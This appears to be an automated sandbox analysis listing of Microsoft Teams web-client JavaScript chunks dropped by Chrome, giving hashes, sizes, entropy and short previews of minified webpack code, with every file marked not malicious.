                                                                                                                                                                                                                                                                            Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[965787],{859960:function(t,e,n){var o,i=this&&this.__extends||(o=Object.setPrototypeOf||{__proto__:[]}instanceof Array&&function(t,e){t.__proto__=e}||function(t,e){for(var n in e)e.hasOwnProperty(n)&&(t[n]=e[n])},function(t,e){function n(){this.constructor=t}o(t,e),t.prototype=null===e?Object.create(e):(n.prototype=e.prototype,new n)});Object.defineProperty(e,"__esModule",{value:!0});var r=function(t){function e(){return null!==t&&t.apply(this,arguments)||this}return i(e,t),e}(n(844549).default);e.default=r},844549:(t,e,n)=>{Object.defineProperty(e,"__esModule",{value:!0});var o=n(743203),i=n(139052),r=function(){function t(t){this.root=null,this.compare=t||o.defaultCompare,this.nElements=0}return t.prototype.add=function(t){return!o.isUndefined(t)&&(null!==this.insertNode(this.createNode(t))&&(this.nElements++,!0))},t.prototype.clear=function(){this.root=null,this.nElements=
                                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (32122)
                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                            Size (bytes):32230
                                                                                                                                                                                                                                                                            Entropy (8bit):5.6201369277512105
                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                            SSDEEP:768:ky15565ygDgN3B5GZa+FAFSQ4dkSPNmsMqYF:ki556IgEkxAF94dkSFYF
                                                                                                                                                                                                                                                                            MD5:B80CABAEA6D226886E17263A4F397E36
                                                                                                                                                                                                                                                                            SHA1:200C4546B6DC10D6ED4FE82F1349F9BCF8E8DF86
                                                                                                                                                                                                                                                                            SHA-256:C7BED8477D6892E7B1D69BAD8791BB8EA5A2AA3D50D9CC0A5E9BA7F79C10BCF0
                                                                                                                                                                                                                                                                            SHA-512:5108041F064FD6C8531180295237F3E262DEB978CB1D62E4140747076BA5AA886B3660B8DA55B9AE64C0DF03A11E2FBEDDB0D75386C217180A8CA82D4BC3F9C0
                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                            Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[675783],{554404:(e,n,t)=>{var i,a,o,s,E,r,S,_,T,l,I,A,c,C,R,p,N,m,d,u,L;t.d(n,{qv:()=>i,SY:()=>a,Kt:()=>o,VA:()=>E,lM:()=>r,Pr:()=>S,Kv:()=>_,To:()=>T,PY:()=>l,bh:()=>I,D2:()=>A,np:()=>C,zD:()=>R,pU:()=>p,s4:()=>N,d8:()=>m,Cu:()=>d,wy:()=>u}),function(e){e.Work="",e[e.Freemium=2]="Freemium",e[e.Life=3]="Life"}(i||(i={})),function(e){e.Personal="personal",e.Channel="channel",e.Unknown="unknown"}(a||(a={})),function(e){e.GuardianChat="GuardianChat"}(o||(o={})),function(e){e[e.anonymous=0]="anonymous",e[e.default=1]="default",e[e.guest=2]="guest",e[e.msaGuest=3]="msaGuest",e[e.msaMember=4]="msaMember",e[e.otpGuest=5]="otpGuest",e[e.otpMember=6]="otpMember"}(s||(s={})),function(e){e[e.Admin=0]="Admin",e[e.Anonymous=1]="Anonymous",e[e.Guest=2]="Guest",e[e.Regular=3]="Regular"}(E||(E={})),function(e){e.x64="x64",e.ia32="ia32",e.x86="x86",e.unknown="unknown"}(r||(r={})),function(e){
                                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (45648)
                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                            Size (bytes):45756
                                                                                                                                                                                                                                                                            Entropy (8bit):5.285670568343104
                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                            SSDEEP:768:cYSBClBRobRhWiH6Ue2zWDm29skdvjWtqag:sBcotT/3Gl9sk9j19
                                                                                                                                                                                                                                                                            MD5:1E0C3820F7F9CA5DFEB57B79A2BF546C
                                                                                                                                                                                                                                                                            SHA1:B43E52EEBD09198CB3CF734528580BCBCD0FA9B5
                                                                                                                                                                                                                                                                            SHA-256:C6D69D99425F6373ACB67DA85FDA3B2060DBFF69A46BDE7587129C1C7FAAF2E3
                                                                                                                                                                                                                                                                            SHA-512:F907D8A1261CACA31B1D81653360C52BB4CDFED9A7DF550D12C59B4EF1F0A491DDD57ACD348B1D99F64D5270D2B218467D854F888BA04B0D8FAB239674B53B9A
                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                            Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[320494],{320494:(e,t,n)=>{n.d(t,{ms:()=>Ge,Hu:()=>Qe,ik:()=>Ue});var o=n(150321),r=n(89968),i=n(29213),a=n.n(i),s=n(200727),l=n.n(s),u=n(61997),c=n.n(u),d=n(445299),p=n.n(d),f=n(883343),h=n.n(f),g=n(112882),m=n.n(g),v=n(109161),y=n.n(v),I=n(565316),b=n.n(I),w=n(189544),C=n.n(w),S=n(848870),x=n.n(S),P=n(37838),k=n.n(P),O=n(26084),A=n.n(O),E=n(996665),D=n(301078),T=n(152450),R=n(121121),_=n(799323),H=n(31828),K=n(182812),M=n(338400),N=n(900046),B=n(992758),V=n(936666),L=n(953543),j=n(182227),F=n(513432),Q=n(62600),U=n.n(Q),G=n(395225),J=n.n(G),W=n(770246),z=n(786244),Z=n(90278),q=(n(164391),0);function X(e){return"function"==typeof e?e:$}function $(){}function Y(e,t){null!==e&&(0,W.A)(e,{boundary:t,block:"nearest",scrollMode:"if-needed"}).forEach((function(e){var t=e.el,n=e.top,o=e.left;t.scrollTop=n,t.scrollLeft=o}))}function ee(e,t){return e===t||e.contains&&e.contains(t)}fun
                                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                            Size (bytes):184177
                                                                                                                                                                                                                                                                            Entropy (8bit):5.3191226575984345
                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                            SSDEEP:3072:fi7gpBpWtqHhwhsfe5eIctg2VlI8BI9WxvzuVreYukk:ugpBpWtqHWsfe5R8yyI9WZuBeYukk
                                                                                                                                                                                                                                                                            MD5:9322E60C4BE9C4A28ADF2987CAAFCA4C
                                                                                                                                                                                                                                                                            SHA1:326505C91BBB0CCC40D1DA0EC6B35D2D17C96139
                                                                                                                                                                                                                                                                            SHA-256:C72402BAC3EEB2E2549F07DA6DF25DF9FB6A09068064942EB73EE8A6FA034F5E
                                                                                                                                                                                                                                                                            SHA-512:50F2722E622DD2C8BBDA26895FEE0C71EB634781E714AFBAD672CD2F3C797BF7F455471E51EDDEBDCB2A9B57335B86B33F4AA7CFD811344201D8962952D7CBD1
                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                            Preview:(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[463638],{926380:(e,t,n)=>{"use strict";n.d(t,{O:()=>r});var a=n(492225);function r(e,t){for(const n of t)Array.isArray(n)?r(e,n):i(e,n);return e}function i(e,t){for(const[n,r]of Object.entries(t)){const t=e[n];void 0===t&&r?e[n]=r:(0,a.Z)(t)&&(0,a.Z)(r)&&Object.assign(e[n],r)}}},953084:(e,t,n)=>{"use strict";n.d(t,{m1:()=>i});var a=n(710773),r=n(691143);function i(e,t){var n;if(!t.length)return e;for(const a of t)e.types?a.types&&s(e.types,a.types):e.types=a.types,e.directives?(null==(n=a.directives)?void 0:n.length)&&o(e.directives,a.directives):e.directives=a.directives;return e}function o(e,t){for(const n of t){const t=e.find((e=>(0,a.d$)(e)===(0,a.d$)(n)));if(!t){e.push(n);continue}const r=(0,a.Gc)(n);if(!r)continue;const i=(0,a.Gc)(t);i?d(i,r):(0,a.iS)(t,r)}}function s(e,t){for(const[n,i]of Object.entries(t)){const t=e[n];if(t){if((0,a.rW)(t)&&(0,a.rW)(i)||(0,a.du)(t)&&(0,a.du)(i))c(
                                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (9134)
                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                            Size (bytes):9242
                                                                                                                                                                                                                                                                            Entropy (8bit):4.404128445775363
                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                            SSDEEP:192:iDFksNgUbgpo5MQ5M5McwlVGDVMhlVZjhJkumEfwgQPHs:iDFkygUbgpglVGDVMHVBhaxEfwNPHs
                                                                                                                                                                                                                                                                            MD5:15E757F3AE9AD0971F5C48C2231B0178
                                                                                                                                                                                                                                                                            SHA1:BA615ADCE70BB482564FEE278061E8A133DB7003
                                                                                                                                                                                                                                                                            SHA-256:8A8082EDD76FC84B7C2548C2B6EACF69D5CC2040FE59149D7D2E74D5C79D6155
                                                                                                                                                                                                                                                                            SHA-512:542BE9098B408A5FB2FCAC0E589EDC41606A7AF93B52C87BCE1632A6009BD3D51F262CF679A7378401B46810CAE3D7C4A0E5477C098A73D793A458D40EC5E23C
                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                            Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[909600],{909600:(a,Z,l)=>{l.d(Z,{dsn:()=>c,pF6:()=>h,glr:()=>v,HVY:()=>e,lVp:()=>A,dcR:()=>r,Dk8:()=>C,MzH:()=>M,e2F:()=>V,jtT:()=>H,FXX:()=>d,unN:()=>n,Sn0:()=>t,Bv7:()=>U,FWW:()=>i,DmZ:()=>u,T1S:()=>R,ysh:()=>F,G4Y:()=>g,M88:()=>s,mMu:()=>L});var m=l(693935);const c=(0,m.U)("CalendarError24Filled","24",["M21 12.02V8.5H3v9.25C3 19.55 4.46 21 6.25 21h5.77A6.5 6.5 0 0 1 21 12.02Zm0-5.77C21 4.45 19.54 3 17.75 3H6.25A3.25 3.25 0 0 0 3 6.25V7h18v-.75Zm2 11.25a5.5 5.5 0 1 0-11 0 5.5 5.5 0 0 0 11 0Zm-6-3a.5.5 0 0 1 1 0v4a.5.5 0 0 1-1 0v-4Zm1.13 6a.62.62 0 1 1-1.25 0 .62.62 0 0 1 1.25 0Z"]),h=(0,m.U)("CalendarError24Regular","24",["M17.75 3C19.55 3 21 4.46 21 6.25v5.77c-.46-.3-.97-.53-1.5-.7V8.5h-15v9.25c0 .97.78 1.75 1.75 1.75h5.06c.18.53.42 1.04.71 1.5H6.25A3.25 3.25 0 0 1 3 17.75V6.25C3 4.45 4.46 3 6.25 3h11.5Zm0 1.5H6.25c-.97 0-1.75.78-1.75 1.75V7h15v-.75c0-.97-.78-1.75-1.75-1.7
                                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (30462)
                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                            Size (bytes):30570
                                                                                                                                                                                                                                                                            Entropy (8bit):5.510739701129899
                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                            SSDEEP:768:WNSQEsqQWt1zSjrOk5PYUSh+UeGFZgccgrmx/iM6q4/cc1KTVziE5cFfg4tOhUPd:WjEsqQFSWGYmrKsychRUUTh
                                                                                                                                                                                                                                                                            MD5:1496BCB2E6FDB9D8FA0DD1E2B99E40A2
                                                                                                                                                                                                                                                                            SHA1:9189D43FE1DCB56D4D51434244E5A28C4EB06F98
                                                                                                                                                                                                                                                                            SHA-256:7B79DFAC6229F607A4D0AC9E5687999933EF21B96650EA8E6439FA6E46B0A6B8
                                                                                                                                                                                                                                                                            SHA-512:3D00EB119CD1FB5D6065B025BFDD56E09B3EC5C4C91E09A28A4725BF19C7CA8FABB2CCB837A4F237E2AE91C56EE0BF94F749840A194F2609FE08ECD7E2785300
                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                            Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[411326,85394],{85394:(e,t,a)=>{a.d(t,{m:()=>M});var o=a(513432),r=a(733071),n=a(854687),s=a(750818),l=a(35871),i=a(531389),c=a(478304),d=a(585536),f=a(164093),u=a(602835),m=a(264278),p=a(293037),v=a(313666),b=a(39186),y=a(488351),B=a(132915),g=a(779134),h=a(95500);function w(e,t,a){const{state:{open:r,setOpen:n,getOptionById:s},defaultProps:l,activeDescendantController:i}=a,c=o.useRef(""),[d,f]=(0,B.Z)(),u=(e,t={startFromNext:!1})=>{const{startFromNext:a}=t,o=i.active(),r=i.find((t=>{const a=s(t);return!!a&&e(a.text)}),{startFrom:a?i.next({passive:!0}):o});return r||i.find((t=>{const a=s(t);return!!a&&e(a.text)}))},p=(0,g.w)(e,t,{state:a.state,defaultProps:l,elementType:"button",activeDescendantController:i});return p.onKeyDown=(0,m.p)((e=>{f(),"Type"===(0,h.p)(e)&&(c.current+=e.key.toLowerCase(),d((()=>{c.current=""}),500),r&&(u((e=>0===e.toLocaleLowerCase().indexOf(c.curren
                                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (8955)
                                                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                                                            Size (bytes):9063
                                                                                                                                                                                                                                                                            Entropy (8bit):5.231917255695747
                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                            SSDEEP:192:YQCbwDIVLcXGok6wWQQ1fAeMalNukWV+IgEwkazpM2VW:Ytw4gX6EZ1MaGPV3TdQm2VW
                                                                                                                                                                                                                                                                            MD5:B9C977E24E5C998A95D54AB4F1959BC1
                                                                                                                                                                                                                                                                            SHA1:8D762B3F531A254D514403A48E0907A77A330410
                                                                                                                                                                                                                                                                            SHA-256:1353180FC89151EEE9F11C86013C59CD0935B97D35995B40C8F0499825789F48
                                                                                                                                                                                                                                                                            SHA-512:9892FF2AEEF3FCE4F39C00FC38E001675D50EA04E913C67FD8B9D288804AF457287306B328C8F57B56DB2AE3D96C965C07599EA36E0F01A12036F7A4884B551F
                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                            URL:https://statics.teams.cdn.office.net/teams-modular-packages/hashed-assets/296222-7353105a2ca8e337.js
                                                                                                                                                                                                                                                                            Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[296222],{415396:(r,e,n)=>{n.d(e,{m:()=>o});var t=n(513432),a=(0,n(177842).D)("@1js/create-shared-react-context",{});function o(r,e){var n=a.get();return n[e]||(n[e]=t.createContext(r))}},134542:(r,e,n)=>{n.d(e,{aL:()=>p});var t=n(642366),a=n(513432),o=n(383851);function i(r){var e=[],n={};function t(){var t=r.getImporters();return t!==e&&(n=function(r){var e,n,t,a,i={};try{for(var u=(0,o.__values)(r),c=u.next();!c.done;c=u.next()){var f=(0,o.__read)(c.value,2),s=f[0],d=f[1];try{for(var l=(t=void 0,(0,o.__values)(Object.keys(d))),v=l.next();!v.done;v=l.next()){var m=v.value;i[s.id+"#"+m]=d[m]}}catch(r){t={error:r}}finally{try{v&&!v.done&&(a=l.return)&&a.call(l)}finally{if(t)throw t.error}}}}catch(r){e={error:r}}finally{try{c&&!c.done&&(n=u.return)&&n.call(u)}finally{if(e)throw e.error}}return i}(e=t)),n}return{loadModule:function(r,e){var n=t()[r+"#"+e];if(!n)throw new Error("
                                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                            Size (bytes):117250
                                                                                                                                                                                                                                                                            Entropy (8bit):5.162816607799181
                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                            SSDEEP:1536:VJnpRP9EvMVNqpO+sq1YuCFiittzZSLF6c4maUNOwFG7KEEMbg4lxzRSYlwqo3nz:VJpljKsc4mabKEngkoojxgtxtGNL9i
                                                                                                                                                                                                                                                                            MD5:B3031C4F76717B55FAC2255321C6DFA0
                                                                                                                                                                                                                                                                            SHA1:1DFAC14C343D0FF7993C6A350F08EB23336D4A98
                                                                                                                                                                                                                                                                            SHA-256:9450D8177F5466EB1DA5B163BC61851902E688B46D31C02723DD0AB5796770E6
                                                                                                                                                                                                                                                                            SHA-512:26D84072A6825C4E7F4F2F607D8A9AB1057B6D778D801B59F24A7635DC525F0D3D0F672CE641F9D9C9CCD4DBB644E4AB62810D04399DF100774730356D0B2EE8
                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                            Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[367927],{367927:(e,t,s)=>{s.d(t,{LF:()=>I,gm:()=>q,K9:()=>F,iA:()=>w,uH:()=>T,VB:()=>j,CP:()=>y,nQ:()=>L,Kh:()=>M,bN:()=>C,h7:()=>n,R5:()=>o,rg:()=>k,GD:()=>N,Jm:()=>E,_A:()=>cs,hC:()=>gs,pf:()=>bs,$x:()=>_s,E0:()=>xe,$d:()=>us,Az:()=>ms,S:()=>ds,TP:()=>fs,be:()=>hs,mz:()=>vs,U6:()=>Pe,xR:()=>Es,yH:()=>Se});var i=s(838369);const n="data-tabster",o="data-tabster-dummy",r=["a[href]","button:not([disabled])","input:not([disabled])","select:not([disabled])","textarea:not([disabled])","*[tabindex]","*[contenteditable]","details > summary","audio[controls]","video[controls]"].join(", "),a=1,l=2,c=3,u=0,d=1,h=2,_=0,m=1,f=2,b=3,v=4,g=0,p=1,E={Invisible:0,PartiallyVisible:1,Visible:2},y={Source:0,Target:1},w={Both:0,Vertical:1,Horizontal:2,Grid:3,GridLinear:4},T={ArrowUp:1,ArrowDown:2,ArrowLeft:3,ArrowRight:4,PageUp:5,PageDown:6,Home:7,End:8},F={Unlimited:0,Limited:1,LimitedTrapFocus:
                                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                            File Type:Unicode text, UTF-8 text, with very long lines (36004)
                                                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                                                            Size (bytes):36114
                                                                                                                                                                                                                                                                            Entropy (8bit):5.435060898875738
                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                            SSDEEP:768:RqPw6S3lD/T/HAVJ/Oo73IUoMcaqlg/jEWu4MkUKMSpqlXD9MjIIZEQJP6Q5mzPj:TBDlSpBFdZ5g1
                                                                                                                                                                                                                                                                            MD5:7DC0E45633D4132B688805FB2CC8F2B1
                                                                                                                                                                                                                                                                            SHA1:4AC87319F87FBC51DA0E78759AB24795067BBE7E
                                                                                                                                                                                                                                                                            SHA-256:8B11A2966D7FE79E636CEE0C0D384A22E27D20E40EF285AE21F0DD8AC8B49E0A
                                                                                                                                                                                                                                                                            SHA-512:947177BB1CFEFEBAF32EDF749AFF9C68D1A30D3929F9906796C7B2C9436F7D8E5D9EB34DDA7EFA3B98A1B4347233F55E8E7D4605A455A60776B853107F0CE95C
                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                            URL:https://statics.teams.cdn.office.net/teams-modular-packages/hashed-assets/193021-fdd3ae78b36e898a.js
                                                                                                                                                                                                                                                                            Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[193021],{928380:(e,t,r)=>{var o,n;r.d(t,{sk:()=>o,$n:()=>n,I6:()=>i,Vt:()=>s,UU:()=>a,EJ:()=>c,Rm:()=>l}),function(e){e.CONFIGURATIONS="configurations",e.CONTEXTUAL_NOTIFICATIONS="contextual-notifications",e.END="end",e.HEADER="header",e.IN_APP_NOTIFICATIONS="in-app-notifications",e.MAIN="main",e.MID_NAV="mid-nav",e.MODAL="modal",e.MONITOR="monitor",e.NAV="nav",e.NAV_CONTROLS="nav-controls",e.NOTIFICATIONS="notifications",e.PRE_CACHE="pre-cache",e.START="start",e.SUBNAV="sub-nav",e.TITLE_BAR="title-bar",e.TOASTS="toasts"}(o||(o={})),function(e){e.configurations="configurations",e.contextualNotifications="contextualNotifications",e.end="end",e.header="header",e.inAppNotifications="inAppNotifications",e.main="main",e.midNav="midNav",e.modal="modal",e.monitor="monitor",e.nav="nav",e.navControls="navControls",e.notifications="notifications",e.preCache="preCache",e.start="start",e
                                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                            Size (bytes):101278
                                                                                                                                                                                                                                                                            Entropy (8bit):5.180843417705069
                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                            SSDEEP:3072:0MP300ZdOxmeQtfUUY4jWSW+Xdl5zy7PInz3wxg:0MP300ZdOxmeQtfUyjWSW+t3y7PInz33
                                                                                                                                                                                                                                                                            MD5:F6E56D3FEFD068CFA45ECC1A5A8361D2
                                                                                                                                                                                                                                                                            SHA1:5788DCDE05A9F50570F3E5C2A8D7DEB273B62C7D
                                                                                                                                                                                                                                                                            SHA-256:3D82A80E9E6B79FE1AC58517995E09A973B981F150A15FE2C19473FA26D6C78D
                                                                                                                                                                                                                                                                            SHA-512:DF088AC1E6A4D5B61968178C8510562130DEB3C1754C7C58AE7017A5945E248C2AD1D3F6DB4A78BE216E4CA188D6736DF51BD2447ED929BF3E14A75FDAFC628B
                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                            Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[299770],{638283:(e,t,r)=>{r.d(t,{$:()=>n,V:()=>a});var n,o=r(709183),i=r(623374);!function(e){e[e.Error=0]="Error",e[e.Warning=1]="Warning",e[e.Info=2]="Info",e[e.Verbose=3]="Verbose"}(n||(n={}));var a=function(){function e(e,t){void 0===t&&(t={}),this.level=n.Info;var r=t.correlationId,o=void 0===r?"":r,i=t.level,a=void 0===i?n.Info:i,s=t.piiLoggingEnabled,c=void 0!==s&&s;this.localCallback=e,this.correlationId=o,this.level=a,this.piiLoggingEnabled=c}return e.prototype.logMessage=function(e,t,r){if(!(e>this.level||!this.piiLoggingEnabled&&r)){var a,s=(new Date).toUTCString();a=o.$.isEmpty(this.correlationId)?s+":"+i.r+"-"+n[e]+(r?"-pii":"")+" "+t:s+":"+this.correlationId+"-"+i.r+"-"+n[e]+(r?"-pii":"")+" "+t,this.executeCallback(e,a,r)}},e.prototype.executeCallback=function(e,t,r){this.localCallback&&this.localCallback(e,t,r)},e.prototype.error=function(e){this.logMessage(n.E
                                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                            Size (bytes):190152
                                                                                                                                                                                                                                                                            Entropy (8bit):5.348678574819375
                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                            SSDEEP:3072:0+mTq9mTuZEOHEXp6WXWkYVlMBMwMlJNbdffVv6GhL+rUWxa:STekBWkYVdLlJNbr6m+rUGa
                                                                                                                                                                                                                                                                            MD5:4877EFC88055D60953886EC55B04DE34
                                                                                                                                                                                                                                                                            SHA1:2341B026A3E2A3B01AFA1A39D1706840D75E09B3
                                                                                                                                                                                                                                                                            SHA-256:8405362EB8F09DF13AE244DE155B51B1577274673D9728B6C81CD0278A63C8B0
                                                                                                                                                                                                                                                                            SHA-512:625844EDC37594D5C2F7622BD1B59278BF68ABB2FA22476C56826433C961C7B1924858A7588F8B6284D3C5AC8738ECB895EEC949DE18667A98C04A59CB03DAC0
                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                            Preview:(window.telemetry_webpackJsonp=window.telemetry_webpackJsonp||[]).push([[2],[,,,function(e,t,n){"use strict";n.r(t),n.d(t,"ValueKind",(function(){return r.e})),n.d(t,"EventLatency",(function(){return r.a})),n.d(t,"EventPersistence",(function(){return r.b})),n.d(t,"TraceLevel",(function(){return r.d})),n.d(t,"AppInsightsCore",(function(){return i.a})),n.d(t,"BaseCore",(function(){return d})),n.d(t,"_ExtendedInternalMessageId",(function(){return r.f})),n.d(t,"EventPropertyType",(function(){return r.c})),n.d(t,"ESPromise",(function(){return g})),n.d(t,"ESPromiseScheduler",(function(){return C})),n.d(t,"ValueSanitizer",(function(){return I})),n.d(t,"NotificationManager",(function(){return E.a})),n.d(t,"BaseTelemetryPlugin",(function(){return S.a})),n.d(t,"ProcessTelemetryContext",(function(){return N.a})),n.d(t,"MinChannelPriorty",(function(){return w.a})),n.d(t,"EventsDiscardedReason",(function(){return P.a})),n.d(t,"DiagnosticLogger",(function(){return c.a})),n.d(t,"LoggingSeverity",(fun
                                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (8955)
                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                            Size (bytes):9063
                                                                                                                                                                                                                                                                            Entropy (8bit):5.231917255695747
                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                            SSDEEP:192:YQCbwDIVLcXGok6wWQQ1fAeMalNukWV+IgEwkazpM2VW:Ytw4gX6EZ1MaGPV3TdQm2VW
                                                                                                                                                                                                                                                                            MD5:B9C977E24E5C998A95D54AB4F1959BC1
                                                                                                                                                                                                                                                                            SHA1:8D762B3F531A254D514403A48E0907A77A330410
                                                                                                                                                                                                                                                                            SHA-256:1353180FC89151EEE9F11C86013C59CD0935B97D35995B40C8F0499825789F48
                                                                                                                                                                                                                                                                            SHA-512:9892FF2AEEF3FCE4F39C00FC38E001675D50EA04E913C67FD8B9D288804AF457287306B328C8F57B56DB2AE3D96C965C07599EA36E0F01A12036F7A4884B551F
                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                            Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[296222],{415396:(r,e,n)=>{n.d(e,{m:()=>o});var t=n(513432),a=(0,n(177842).D)("@1js/create-shared-react-context",{});function o(r,e){var n=a.get();return n[e]||(n[e]=t.createContext(r))}},134542:(r,e,n)=>{n.d(e,{aL:()=>p});var t=n(642366),a=n(513432),o=n(383851);function i(r){var e=[],n={};function t(){var t=r.getImporters();return t!==e&&(n=function(r){var e,n,t,a,i={};try{for(var u=(0,o.__values)(r),c=u.next();!c.done;c=u.next()){var f=(0,o.__read)(c.value,2),s=f[0],d=f[1];try{for(var l=(t=void 0,(0,o.__values)(Object.keys(d))),v=l.next();!v.done;v=l.next()){var m=v.value;i[s.id+"#"+m]=d[m]}}catch(r){t={error:r}}finally{try{v&&!v.done&&(a=l.return)&&a.call(l)}finally{if(t)throw t.error}}}}catch(r){e={error:r}}finally{try{c&&!c.done&&(n=u.return)&&n.call(u)}finally{if(e)throw e.error}}return i}(e=t)),n}return{loadModule:function(r,e){var n=t()[r+"#"+e];if(!n)throw new Error("
                                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                            File Type:Unicode text, UTF-8 text, with very long lines (65484), with no line terminators
                                                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                                                            Size (bytes):127393
                                                                                                                                                                                                                                                                            Entropy (8bit):4.691765049778823
                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                            SSDEEP:1536:2EQAIJqdovv9QFXHpVHWbA+rfQDBmDoGVuQfOm5/Zh+a0C:vQAHdivK1HWbA+rfaBm+Q2mV5
                                                                                                                                                                                                                                                                            MD5:D7D39CB4C24812041ECFE140BFC00A45
                                                                                                                                                                                                                                                                            SHA1:9417A74D1F8BA5C853C80EB617BAEB53C77CAF7E
                                                                                                                                                                                                                                                                            SHA-256:B5E176F95173A8561F51ECF29D92F0DB810B951496027E48EBAE65FC2B918778
                                                                                                                                                                                                                                                                            SHA-512:C0DB23A4ED5486A0135CBE43F44BE20B61A6647FB0BB71F45EAAFF5F411264C89C827E2C6BEE19D8BAAF2D25DFD4E9804863EF6D757A57505498BCCB00EC8204
                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                            URL:https://statics.teams.cdn.office.net/teams-modular-packages/hashed-assets/teams-and-channels-locale-en-us-a79e7cf059c54df7.js
